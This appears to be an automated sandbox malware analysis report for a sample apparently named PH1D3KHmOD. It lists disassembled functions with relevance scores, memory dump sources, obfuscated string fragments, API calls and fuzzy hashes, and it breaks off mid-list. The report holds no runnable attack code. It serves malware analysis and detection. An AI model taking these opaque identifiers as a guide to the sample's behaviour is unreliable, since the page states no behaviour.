                                                      Function 000F60E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                      • API String ID: 0-2746398225
                                                      • Opcode ID: a63c7615c14c92b8d11ab2b819cda41519dd297c4289a4a03ba1b1c4e3a75201
                                                      • Instruction ID: da9f64c938cbf0f4c631ccb68dfaaa3fe45f6467fbdebff3bef166368c37b2d8
                                                      • Opcode Fuzzy Hash: a63c7615c14c92b8d11ab2b819cda41519dd297c4289a4a03ba1b1c4e3a75201
                                                      • Instruction Fuzzy Hash: 1A422272A083548FC7348F28D8917ABB7E2FF95300F19893CD5D987696DB358846DB82
                                                      Function 000EF60D Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 845COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(?), ref: 000EFDFC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: #$6$=$\$g$m$w$x
                                                      • API String ID: 237503144-139252074
                                                      • Opcode ID: 39c7cd4539f2380836f2ad529928d9ca554644c6cef84028d781976a6a3e6f5a
                                                      • Instruction ID: 69c0d81d833d7bc0790e6af4e1812526fec244b7ecab6490a36d13ce8b70c552
                                                      • Opcode Fuzzy Hash: 39c7cd4539f2380836f2ad529928d9ca554644c6cef84028d781976a6a3e6f5a
                                                      • Instruction Fuzzy Hash: FA72923261C7918FD328DA39C8553AFBAD2ABD5320F198B3DE4E9D73D2D67489018742
                                                      Function 000F1227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$+$>$@$F$L$[$`
                                                      • API String ID: 0-4163809010
                                                      • Opcode ID: 637d2c988d717c7c26c8b5a2aa38d40da0ee461d8bd85cc395cf7efbe14e5593
                                                      • Instruction ID: ba870bc20132bc12fc779c49e42f88be0acc57b302406ff15a83dde87047fd9b
                                                      • Opcode Fuzzy Hash: 637d2c988d717c7c26c8b5a2aa38d40da0ee461d8bd85cc395cf7efbe14e5593
                                                      • Instruction Fuzzy Hash: AB529E7260C7808FC3249B38C5953EEBBE1AB95320F194A2EE5D9D77C2DA7489419B43
                                                      Function 002A6154 Relevance: 14.1, Strings: 10, Instructions: 1648COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %wu$*!D$.e~s$R7?$Ta*$UI0($^,;~$dcv~$p%7$wF~^
                                                      • API String ID: 0-1329555157
                                                      • Opcode ID: ade2d0b8193535a8e57dfbe3a0892eea5f4e5dd56e74ca717f6fadf13d2418d0
                                                      • Instruction ID: d3f2e8428ce7b61a5b1408565e94079465ef73e36ba99d58c3a8bdf48b67e194
                                                      • Opcode Fuzzy Hash: ade2d0b8193535a8e57dfbe3a0892eea5f4e5dd56e74ca717f6fadf13d2418d0
                                                      • Instruction Fuzzy Hash: 48B2F7F3A0C2149FE3046E2DEC8577ABBE9EF94360F1A453DEAC4C7744EA3558048696
                                                      Function 002A46BE Relevance: 14.1, Strings: 10, Instructions: 1578COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `pX$ I=$#[{k$%b~=$(7($1z{$Rn-$Vn-$opo$xo:
                                                      • API String ID: 0-2096714910
                                                      • Opcode ID: d071d8d1ad57bc72b6d7d3c4158ccc7dc3a2d2dd66bc06b69d249a7e949f0de0
                                                      • Instruction ID: 3eabc79d688086e917840773743beb6794b8ff30f483383357081c109c1600bb
                                                      • Opcode Fuzzy Hash: d071d8d1ad57bc72b6d7d3c4158ccc7dc3a2d2dd66bc06b69d249a7e949f0de0
                                                      • Instruction Fuzzy Hash: E1B2C3F3608200AFE704AE19EC8567AF7E9EF94720F1A493DEAC4C3744E63598458797
                                                      Function 000F747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _^]\
                                                      • API String ID: 0-3116432788
                                                      • Opcode ID: 4513b023f55ed5d59980bcc2a2264d3fa7b5da84deea31e3ea144a35da153816
                                                      • Instruction ID: 94b461c46c66daef0cce5e942e767563a08e42f2c6bbdcc68cc095c98f66faac
                                                      • Opcode Fuzzy Hash: 4513b023f55ed5d59980bcc2a2264d3fa7b5da84deea31e3ea144a35da153816
                                                      • Instruction Fuzzy Hash: 5B8225715083518BC724CF28C8917BBB7E2FFC9314F198A6CE9D9976A5E7348806D742
                                                      Function 000E9310 Relevance: 9.2, Strings: 7, Instructions: 431COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                      • API String ID: 0-3116088196
                                                      • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                      • Instruction ID: e58199f26287a4984fb3e88d6bf6c61b73e3b03cc76c298a3d53531deea2536b
                                                      • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                      • Instruction Fuzzy Hash: 74C126B260C3D54FD322CF6A94A075BFFD19FD6210F094AACE4D52B386D275890AC792
                                                      Function 001081CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001084BD
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 001085B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: LF7Y$_^]\
                                                      • API String ID: 237503144-3688711800
                                                      • Opcode ID: 21f427949dbbf9c4a48d7db67b37973f7bbd647959af5c2ae27154c6f3db69af
                                                      • Instruction ID: 2133a650880b71b1ab51a2613f73362986059d0463df1b64ba02f2155a4090b0
                                                      • Opcode Fuzzy Hash: 21f427949dbbf9c4a48d7db67b37973f7bbd647959af5c2ae27154c6f3db69af
                                                      • Instruction Fuzzy Hash: F0220E7190C381DFD3248F28D88172BBBE1BF89320F194A6CE9D9572E1D7719952CB92
                                                      Function 001083D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001084BD
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 001085B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: LF7Y$_^]\
                                                      • API String ID: 237503144-3688711800
                                                      • Opcode ID: 529731c423335db82d85756b90bda80635419628430c7cc268a33eecec9829d8
                                                      • Instruction ID: 16c0455e7af80f48a18b7b4b7e7366d7551eec73dd8846530ef59f6b702ecc06
                                                      • Opcode Fuzzy Hash: 529731c423335db82d85756b90bda80635419628430c7cc268a33eecec9829d8
                                                      • Instruction Fuzzy Hash: 0012107190C381DFD3248F28D88176BBBE1BF89310F194A6CE9D9572E1D7709952CB92
                                                      Function 002AB24B Relevance: 6.7, Strings: 4, Instructions: 1735COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q/4$[F~?$rQ}.$uw/
                                                      • API String ID: 0-611836863
                                                      • Opcode ID: ca81ab9304ba9b0a17162b39d848426f4c1671c65a83280fc6d358d78843968b
                                                      • Instruction ID: 77c4b07a32604fcc4732eec30968f3517d4949accd0df3e0319f56b657bd7647
                                                      • Opcode Fuzzy Hash: ca81ab9304ba9b0a17162b39d848426f4c1671c65a83280fc6d358d78843968b
                                                      • Instruction Fuzzy Hash: D4B2FBF3608204AFE304AE2DEC85A7AB7E9EFD4720F1A853DEAC4C3744E57558058697
                                                      Function 001024E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                      • API String ID: 0-1171452581
                                                      • Opcode ID: d2b4a46609a142b437e9398d515477966ab11fb25dad5cb2c0f80bce20d68d61
                                                      • Instruction ID: 985ce03f63562bbbbcc6913af2d0ace64a31519440cb5252b6e875faa5cd3ae7
                                                      • Opcode Fuzzy Hash: d2b4a46609a142b437e9398d515477966ab11fb25dad5cb2c0f80bce20d68d61
                                                      • Instruction Fuzzy Hash: 0891F1B16083009BC7249F24C895BA7B7F5EF95318F19842CF9C98B2D2E3B5E906C756
                                                      Function 000F8169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2h?n$7$SP$^`/4$gfff
                                                      • API String ID: 0-3257051659
                                                      • Opcode ID: 5ac865eece661e8749d5fa4cb78e48832db7c598d466312f2dc18716911dfc6b
                                                      • Instruction ID: 110d2b09d812529ca59c9c526dd3926247282b4877e1bb30f260eabbbd7f9f86
                                                      • Opcode Fuzzy Hash: 5ac865eece661e8749d5fa4cb78e48832db7c598d466312f2dc18716911dfc6b
                                                      • Instruction Fuzzy Hash: 46A14672A143508BD724CF28D8517AFB7E2FBC4318F19CA3DE585D7791EA3899068781
                                                      Function 0029C51B Relevance: 6.2, Strings: 4, Instructions: 1243COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
